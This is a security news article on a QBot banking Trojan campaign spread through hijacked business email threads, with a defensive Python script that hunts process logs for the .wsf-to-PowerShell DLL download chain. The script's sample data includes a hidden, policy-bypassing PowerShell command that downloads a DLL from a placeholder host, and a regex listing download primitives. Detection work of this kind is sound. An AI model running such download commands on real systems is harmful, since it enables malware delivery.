New QBot Banking Trojan Operation Uses Compromised Business Emails as Entry Point

    Infections have already been detected in 10 countries, including Russia, the UK and the USA.

    According to the latest report from Kaspersky Lab, a new QBot campaign is using hijacked business email conversations to trick unsuspecting victims into installing the malware on their devices.

    The latest wave of malware activity, recorded on April 4 this year, was primarily targeted at users in Germany, Argentina, Italy, Algeria, Spain, the United States, Russia, France, Great Britain, and Morocco.

    QBot (aka Qakbot or Pinkslipbot) is a banking Trojan that has been active since at least 2007. In addition to stealing passwords and cookies from web browsers, it acts as a backdoor and loader for next-stage payloads such as Cobalt Strike or various ransomware families.

    Spread through phishing campaigns, the malware has been updated continuously throughout its lifetime. The latest versions use anti-virtual-machine, anti-debugging and anti-sandbox techniques to evade detection and analysis by researchers.

    According to Check Point analysts, QBot was the most prevalent malware in March of this year.

    “At first, QBot was distributed through infected websites and pirated software. Now the banker is delivered to potential victims using malware already on their computers, as well as social engineering and spam mailings,” Kaspersky researchers said, explaining QBot's distribution methods.


    Email thread hijacking is far from new. Cybercriminals insert themselves into existing business conversations, or start new ones using information harvested from previously compromised email accounts, so that the message arrives from a known correspondent with a plausible context. The goal is to get the recipient to click a malicious link or open a malicious attachment.

    In the latest QBot campaign, the lure is a PDF that claims it cannot be displayed because it contains protected files. To "view" it, the victim must click an "Open" button, which downloads a ZIP archive from an attacker-controlled website.


    The archive contains an obfuscated Windows Script File (".wsf") whose only job is to launch a PowerShell script. That script in turn downloads a DLL from the attackers' remote server, and the DLL is the QBot payload itself.
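    The delivery chain above (a script host running a .wsf that spawns PowerShell, which fetches a DLL) leaves a distinctive parent/child pattern in process-creation telemetry. The following is an added hunting example, not code from the article or from Kaspersky: it walks Sysmon Event ID 1 style records, flags any powershell.exe whose parent is wscript.exe or cscript.exe running a .wsf and whose command line both invokes a download primitive and names a .dll, and lists the hosts that match so they can be isolated (the containment step the article recommends below). The hostnames, PIDs, paths, URL and the benign logon-script records are constructed for the example; the field names mirror Sysmon but any EDR export with host, pid, ppid, image and command line will do.

```python
"""Hunt for the .wsf -> powershell.exe -> DLL download chain in process-creation logs.

Chain as described in the article: script host runs the obfuscated .wsf, the .wsf
launches PowerShell, PowerShell downloads the QBot DLL from a remote server.
Example code; the sample records below are constructed, not real telemetry.
"""
import re

# Constructed sample records modelled on Sysmon EventID 1 fields. Host names,
# PIDs, user names, paths and the URL are invented for this example.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "pid": 412, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\explorer.exe"},
    # Victim double-clicks the .wsf extracted from the ZIP: explorer.exe -> wscript.exe
    {"host": "WS-FIN-07", "pid": 5120, "ppid": 412,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\jsmith\Downloads\Invoice_2023\document.wsf"'},
    # The .wsf launches PowerShell, which pulls the DLL from the attackers' server
    {"host": "WS-FIN-07", "pid": 5188, "ppid": 5120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p/x.dll','C:\Users\jsmith\AppData\Local\Temp\x.dll')"},
    # Benign activity on another host: a logon script run by wscript, no download, no DLL.
    {"host": "WS-IT-02", "pid": 2200, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\explorer.exe"},
    {"host": "WS-IT-02", "pid": 2310, "ppid": 2200,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "\\fileserver\netlogon\mapdrives.wsf"'},
    {"host": "WS-IT-02", "pid": 2350, "ppid": 2310,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "New-PSDrive -Name S -PSProvider FileSystem -Root \\fileserver\share"'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Common PowerShell download / remote-execution primitives (case-insensitive).
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|\bcurl\b|\bwget\b|\biex\b|invoke-expression", re.I)
DLL_RE = re.compile(r"\.dll\b", re.I)
WSF_RE = re.compile(r"\.wsf\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_qbot_chains(events):
    """Return one finding per powershell.exe whose parent is a script host running
    a .wsf and whose command line both downloads something and names a .dll."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        if not (DOWNLOAD_RE.search(e["cmdline"]) and DLL_RE.search(e["cmdline"])):
            continue
        parent = by_key.get((e["host"], e["ppid"]))
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        if not WSF_RE.search(parent["cmdline"]):
            continue
        findings.append({
            "host": e["host"],
            "script_host_pid": parent["pid"],
            "wsf_cmdline": parent["cmdline"],
            "powershell_pid": e["pid"],
            "powershell_cmdline": e["cmdline"],
        })
    return findings


def hosts_to_isolate(events):
    """Distinct hosts with at least one matching chain: candidates for immediate isolation."""
    return sorted({f["host"] for f in find_qbot_chains(events)})


if __name__ == "__main__":
    for f in find_qbot_chains(SAMPLE_EVENTS):
        print(f"[!] {f['host']}: wscript pid {f['script_host_pid']} -> powershell pid {f['powershell_pid']}")
        print("    parent:", f["wsf_cmdline"])
        print("    child: ", f["powershell_cmdline"])
    print("Isolate:", hosts_to_isolate(SAMPLE_EVENTS))
```

    The rule keys on the parent/child relationship rather than on file names or hashes, which the attackers change per campaign; the .wsf itself is obfuscated, but it still has to invoke a script host and spawn PowerShell, and that relationship survives obfuscation. The benign logon-script records show why the download and .dll conditions matter: wscript.exe launching PowerShell on its own is common in managed environments.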

    Infection with this malware can lead to devastating attacks on corporate networks. Researchers at The DFIR Report showed last year that QBot begins stealing sensitive data roughly half an hour after the initial infection and, worse, starts spreading to neighboring workstations within about an hour.

    If a device is infected with QBot, it is essential to take it offline as quickly as possible and then assess the entire network for unusual behavior, because by the time the infection is noticed the malware may already have moved laterally.

    Author DeepWeb